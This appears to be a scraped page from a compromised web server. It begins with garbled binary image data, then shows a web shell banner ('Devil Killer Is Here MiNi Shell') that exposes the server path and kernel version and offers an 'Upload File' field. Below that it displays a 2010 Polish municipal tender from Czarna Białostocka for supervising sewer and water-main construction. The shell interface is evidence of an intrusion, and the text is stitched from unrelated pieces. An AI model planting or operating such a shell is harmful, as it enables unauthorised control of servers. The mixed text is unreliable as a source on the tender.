JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100916/294932-N-2010.html

<p class="kh_header"><b>Czarna Białostocka: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego branży sanitarnej podczas realizacji inwestycji pn.: Budowa systemu kanalizacji sanitarnej i sieci wodociągowej dla aglomeracji Czarna Białostocka</b><br>
<b>Numer ogłoszenia: 294932 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego branży sanitarnej podczas realizacji inwestycji pn.: Budowa systemu kanalizacji sanitarnej i sieci wodociągowej dla aglomeracji Czarna Białostocka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełnienie funkcji Inspektora Nadzoru Inwestorskiego branży sanitarnej podczas realizacji inwestycji pn. Budowa systemu kanalizacji sanitarnej i sieci wodociągowej dla aglomeracji Czarna Białostocka, który obejmuje niżej wymienione zadania:
a)	Zadanie II: Budowa kanalizacji sanitarnej na osiedlu Pierekały w Czarnej Białostockiej (III etap) obejmująca w szczególności:
wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym drogi gminnej z Gminą Czarna Białostocka wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót; wykonanie geodezyjnego tyczenia trasy sieci i przyłączy kanalizacyjnych (uwaga: kanały tłoczne wykonane w 2009 r. do skrzyżowania ul. Świerkowej z ul. Dębową - rejon studni S 3/24); wykonanie wykopów pod kanały sanitarne grawitacyjne i tłoczne, przyłącza i studnie kanalizacyjne; wykonanie kanału sanitarnego z rur PVC, litych, klasy S o śr. 200 mm - ok. 545,0 mb; montaż studni kanalizacyjnych PE 1000 z włazem żeliwnym D600, 40T, pierścieniem dystansowym i odciążającym - szt. 14; montaż studni kanalizacyjnych betonowych o śr. 1000 mm - szt. 3; montaż studni kanalizacyjnych PVC-U 425 z włazem żeliwnym - szt. 20; wykonanie przyłączy kanalizacji sanitarnej z rur PCV, litych, klasy S o śr. 160 mm - ok. 139,0 mb; dostawa i montaż najazdowej przepompowni ścieków P2 z włazem kl. D-400 zatrzaskowe z zabezpieczeniem antykradzieżowym np. typu OTC wraz z systemem monitoringu zdalnego, okablowaniem elektrycznym, podłączeniem do energetycznej listwy zasilającej, uruchomieniem - 1 kpl; dostawa i montaż pompowni ścieków P3 wraz z systemem monitoringu zdalnego, okablowaniem elektrycznym, podłączeniem do energetycznej listwy zasilającej, uruchomieniem oraz ogrodzeniem - 1 kpl; wykonanie kanału tłocznego PE 90 x 5,1 (SDR 17 PE 100, PN-10) - ok. 522,00 mb; wykonanie geodezyjnej inwentaryzacji powykonawczej; wykonanie inspekcji telewizyjnej zrealizowanej sieci kanalizacji sanitarnej; odtworzenie nawierzchni dróg gruntowych z uwzględnieniem rozścielenia nowej wierzchniej warstwy żwirowej z zagęszczenie (gr. 10 cm po zagęszczeniu) na całej szerokości drogi w której realizowana jest inwestycja kanalizacyjna.
b)	Zadanie III: Budowa wodociągu na osiedlu Miasteczko w Czarnej Białostockiej obejmująca w szczególności:
wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym drogi gminnej z Gminą Czarna Białostocka wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót (od węzła W16 wykonanego w roku 2010); wykonanie geodezyjnego tyczenia trasy sieci i przyłączy wodociągowych (uwaga: węzeł W16 wykonany w roku 2010 r.); wykopy pod kanały magistrali wodociągowej wewnątrz osiedlowej i przyłącza; wykonanie sieci wodociągowej z przyłączami wodociągowymi od węzła W16 do węzła W16/10 z rur PE PN10 SDR 17 lub równoważnych wraz z niezbędnym osprzętem odcinającym oraz hydrantami w zakresie średnic: o śr. 160 mm - ok. 186 mb, o śr. 110 mm - ok. 318 mb, o śr. 90 mm - ok. 8 mb, o śr. 32 mm - ok. 18 mb; wykonanie 2 szt. włączeń istniejącej sieci zasilającej budynki mieszkalne do realizowanej sieci wodociągowej; wykonanie geodezyjnej inwentaryzacji powykonawczej; odtworzenie nawierzchni dróg i chodników.
c)	Zadanie IV: Budowa kanalizacji sanitarnej na ul. Wrzosowej i Fabrycznej oraz osiedlu Miasteczko w Czarnej Białostockiej obejmująca w szczególności:
wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym drogi gminnej z Gminą Czarna Białostocka oraz w pasie drogowym drogi powiatowej z Powiatowym Zarządem Dróg w Białymstoku wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót; uzyskanie zgody na wejście na teren związany z przebudową przepompowni P6 (dz. Nr ewid. 1594 obręb Czarna Białostocka) od PKP S.A. Odział Gospodarowania Nieruchomościami  w Warszawie wraz z uwzględnieniem kosztów zajęcia terenu na czas robót oraz trwałe zajęcie gruntu w czasie obowiązywania umowy na wykonanie zadania; uzyskanie zgody po przedłożeniu organizacji robót prowadzonych na terenie PKP na  przebudowę przepompowni P6 od Zakładu Linii Kolejowych w Białymstoku; wykonanie geodezyjnego tyczenia trasy sieci i przyłączy kanalizacyjnych oraz posadowienia przepompowni P5B, P5C, P5, P6; wykopy pod kanał sanitarny, przyłącza, studnie kanalizacyjne, przepompownie; wykonanie przepięcia istniejących przyłączy kanalizacji sanitarnej do wybudowanej sieci na terenie os. Miasteczko do studni 15/3 oraz 21/3 lub do studni 9/3; wykonanie kanału sanitarnego tłocznego z rur PE PN10 SDR 17 następujących średnic: PE 160 x 9,5 - ok. 1.880 mb, PE 110 x 6,6 - ok. 519 mb, PE 90 x 5,4 - ok. 6 mb; wykonanie przecisków z rur stalowych lub równoważnych: RS 219 - 7 szt. o długościach: 6m - 5 szt., 3m - 1 szt., 16m - 1 szt., RS 273 - 5 szt. o długościach: 11m - 3 szt., 14m - 1 szt.,7m - 1 szt., RS 160 - 1 szt. o długości  9 m; wykonanie kanału sanitarnego i przyłączy z rur PCV, litych, klasy S o śr.: DN 315 - ok. 17 mb, DN 250 - ok. 337 mb, DN 200 - ok. 910 mb (w tym przyłącza 12 szt. o łącznej długości ok. 85 mb)wraz z montażem studni kanalizacyjnych przelotowych, przyłączeniowych, przelotowo-przyłączeniowych, rozprężnych, z zaworem napowietrzająco-odpowietrzającym, z zasuwami nożowymi); dostawa, montaż i uruchomienie nowych przepompowni ścieków: P5B Fabryczna i P5C Miasteczko; przebudowa przepompowni ścieków z demontażem starych z dostawą, montażem i uruchomieniem nowych przepompowni: P5 Wierzbowa i P6 Brzozowy Mostek; wykonanie linii zasilania elektrycznego ww. przepompowni; dostawa i montaż rur dwudzielnych AROT typ A110PS lub równoważnych jako zabezpieczenie kabli telefonicznych; wykonanie geodezyjnej inwentaryzacji powykonawczej; odtworzenie nawierzchni; wykonanie inspekcji telewizyjnej kanalizacji sanitarnej - grawitacyjnej.
d)	Zadanie V: Budowa kanalizacji sanitarnej na osiedlu Buksztel w Czarnej Białostockiej obejmująca w szczególności:
wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym dróg gminnych z Gminą Czarna Białostocka, w pasie drogowym drogi powiatowej  z Powiatowym Zarządem Dróg w Białymstoku oraz w pasie drogowym drogi krajowej z Generalną Dyrekcją Dróg Krajowych i Autostrad wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót; wykonanie geodezyjnego tyczenia trasy sieci, przyłączy kanalizacyjnych i tłoczni; wykopy pod kanał sanitarny, przyłącza, studnie kanalizacyjne, tłocznię; wykonanie odwodnień wykopów igłofiltrami oraz rurarzem drenarskim; budowa studni rewizyjnych bet. fi 1000 - 41 szt.; budowa studni kanalizacyjnych systemowych PVC, fi 600 - 1 szt.; budowa studzienek przyłączeniowych, systemowych PVC, fi 400 - 24 szt.; budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S fi 200 - ok. 1.207,00 mb; budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S, fi 160, przyłącza - ok. 257,00 mb; przeciski pod drogą krajową w osłonie z rury stalowej 219,1 x 8,0 - 6 przecisków o łącznej długości ok. 72,00 mb; przecisk w rurze osłonowej stalowej 273,0 x 8,8 - 7 przecisków o łącznej długości - ok. 69,00 mb; dostawa, montaż, uruchomienie tłoczni ścieków P1 z podłączeniem energetycznym oraz ogrodzeniem; budowa kanału ciśnieniowego rur PE100 SDR 17 110x6,6 - ok. 290,00 mb; przebudowa hydrantu DN 80 - 1 kpl; roboty odtworzeniowe nawierzchni z mas mineralno-bitumicznych, polbruku, płyt drogowych sześciokątnych o boku 15 cm, płytek chodnikowych 35 x 35 x 5 itp. oraz nawierzchni dróg gruntowych z jednoczesnym rozesłaniem żwiru drogowego gr. 10 cm (po zagęszczeniu) na całej szerokości drogi na której realizowana jest inwestycja; wykonanie geodezyjnej inwentaryzacji powykonawczej; wykonanie inspekcji telewizyjnej kanalizacji sanitarnej - grawitacyjnej; przebudowa kolidującej sieci TPSA.
e)	Zadanie VI: Budowa kanalizacji sanitarnej na osiedlu Tartaczne w Czarnej Białostockiej obejmująca w szczególności:
wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym dróg gminnych z Gminą Czarna Białostocka, wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót; wykonanie geodezyjnego tyczenia trasy sieci, przyłączy kanalizacyjnych i tłoczni; wykopy pod kanał sanitarny, przyłącza, studnie kanalizacyjne, tłocznię; budowa studni rewizyjnych bet. fi 1000 - 59 szt.; budowa studzienek przyłączeniowych, systemowych PVC, fi 400 - 58 szt.; budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S fi 200 - ok. 1.440,00 mb; budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S, fi 160, przyłącza - ok. 344,00 mb; dostawa, montaż, uruchomienie tłoczni ścieków P2 z podłączeniem energetycznym oraz ogrodzeniem; budowa kanału ciśnieniowego z rur PE100 SDR 17 110x6,6 - ok. 372,00 mb; przebudowa przyłączy wodociągowych szt.3 , DN 32, o łącznej długości 15 mb; roboty odtworzeniowe nawierzchni z mas mineralno-bitumicznych, polbruku, płyt drogowych sześciokątnych o boku 15 cm, płytek chodnikowych 35 x 35 x 5 itp. oraz nawierzchni dróg gruntowych z jednoczesnym rozesłaniem żwiru drogowego gr. 10 cm (po zagęszczeniu) na całej szerokości dróg na których realizowana jest inwestycja; wykonanie geodezyjnej inwentaryzacji powykonawczej; wykonanie inspekcji telewizyjnej kanalizacji sanitarnej - grawitacyjnej.
2.	Inwestycja objęta nadzorem współfinansowana jest ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013
3.	Do podstawowych obowiązków Wykonawcy należy:
a)	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektami i pozwoleniami na budowę, przepisami oraz zasadami wiedzy technicznej;
b)	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;
c)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
d)	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie Zamawiającego, kontrolowanie rozliczeń budowy;
e)	informowanie Zamawiającego co najmniej raz na dwa tygodnie o realizacji nadzorowanych robót budowlanych;
f)	pisemne zgłaszanie Zamawiającemu o zaistniałych okolicznościach mogących mieć wpływ na jakość, rzetelność, terminowość wykonania nadzorowanych robót budowlanych, w terminie 3 dni od powzięcia wiadomości o wystąpieniu takich okoliczności;
g)	wymagana jest należyta staranność przy realizacji zobowiązań umowy;
h)	zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
4.	Wykonawca ma prawo:
a)	wydawać kierownikowi budowy lub kierownikowi robót polecenia, potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
b)	żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
5.	Wykonawca działać będzie w granicach umocowania określonego w ustawie Prawo budowlane oraz przepisach szczegółowych.
6.	Wymagania organizacyjne:
a)	rozliczenie nastąpi na podstawie faktur (rachunków) częściowych z 30-dniowym terminem płatności, który Wykonawca wystawi po podpisaniu protokołu odbioru robót; zgodnie z przedstawionym w ofercie harmonogramem podziału łącznego kosztu nadzoru inwestorskiego;
b)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy;
c)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 usług polegających na sprawowaniu nadzoru inwestorskiego branży sanitarnej na zlecenie zamawiającego z sektora finansów publicznych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowaniem osobami posiadającym uprawnienia do pełnienia funkcji inspektora nadzoru inwestorskiego branży sanitarnej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz ofertowy - wypełniony i podpisany przez wykonawcę z wykorzystaniem załączonego wzoru;
b)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem załączonego wzoru;
c)	harmonogram podziału łącznego kosztu nadzoru inwestorskiego na poszczególne zadania inwestycyjne adekwatnie do założonych terminów zakończenia pełnienia nadzoru;
d)	jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, należy dołączyć pisemne zobowiązania tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian w umowie w trybie art. 144 ust. 1 ustawy Pzp:
a)	w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku:
w przypadku przedłużenia terminu wykonania robót objętych przez Wykonawcę nadzorem inwestorskim, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności;
w przypadku stwierdzenia przez wykonawcę możliwości wcześniejszego wykonania przedmiotu umowy;
w przypadku prowadzenia robót budowlanych wynikających z rękojmi za wady lub gwarancji, termin o którym mowa w ust. 1 ulega przedłużeniu o okres ich realizacji;
w innej sytuacji jakiej nie można było przewidzieć w chwili zawarcia umowy;
w przypadku zmiany terminu realizacji przedmiotu umowy, z wyżej wymienionych przyczyn, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności;
b)	w zakresie skrócenia terminu realizacji zamówienia w przypadku stwierdzenia przez wykonawcę możliwości wcześniejszego wykonania przedmiotu umowy;
c)	zamawiający nie ma obowiązku przedłużenia terminu wykonania usług, jeżeli wykonawca w terminie 7 dni od wystąpienia okoliczności, o których mowa w ust. 2 lit. a), nie złoży zamawiającemu, na piśmie, uzasadnionego wniosku o przedłużenie terminu wykonania przedmiotu umowy i  nie uzyska  akceptacji tego wniosku;
d)	rozszerzenie odpowiedzialności z tytułu rękojmi lub przedłużenia terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez wykonawcę;
e)	zmniejszenie wynagrodzenia Wykonawcy w przypadku zmniejszenia zakresu przedmiotu zamówienia z przyczyn niezależnych od Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, 16-020 Czarna Białostocka, ul. Traugutta 2, pok. 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 11:00, miejsce: Urząd Miejski, 16-020 Czarna Białostocka, ul. Traugutta 2, pok. 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




